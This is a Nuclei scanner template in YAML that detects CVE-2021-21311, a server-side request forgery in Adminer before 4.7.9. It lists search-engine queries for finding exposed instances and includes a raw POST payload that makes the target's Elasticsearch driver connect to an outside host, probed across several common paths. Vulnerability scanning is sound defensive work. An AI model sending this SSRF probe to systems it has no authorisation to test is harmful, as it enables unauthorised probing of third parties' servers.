id: CVE-2021-21311

info:
  name: Adminer <4.7.9 - Server-Side Request Forgery
  author: Adam Crosser,pwnhxl
  severity: high
  description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  remediation: Upgrade to version 4.7.9 or later.
  reference:
    - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
    - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
    - https://packagist.org/packages/vrana/adminer
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21311
    - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2021-21311
    cwe-id: CWE-918
    epss-score: 0.01052
    epss-percentile: 0.82411
    cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 6
    vendor: adminer
    product: adminer
    shodan-query: title:"Login - Adminer"
    fofa-query: app="Adminer" && body="4.7.8"
    hunter-query: app.name="Adminer"&&web.body="4.7.8"
  tags: cve,cve2021,adminer,ssrf

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}

    payloads:
      path:
        - "/index.php"
        - "/adminer.php"
        - "/adminer/adminer.php"
        - "/adminer/index.php"
        - "/_adminer.php"
        - "/_adminer/index.php"

    attack: batteringram
    stop-at-first-match: true
    cookie-reuse: true
    redirects: true
    max-redirects: 1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>400 - Bad Request</title>"
          - "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
        condition: or

      - type: status
        status:
          - 403
# digest: 4b0a00483046022100e81f9f5c0502add6c8b82e8192206f7cbd76be0620096fb716d2267170ea540b022100b7e528cf166b0dee9f24d067a1f9b4211690808eefefefdbc15fa6b69b554d42:922c64590222798bb761d5b6d8e72950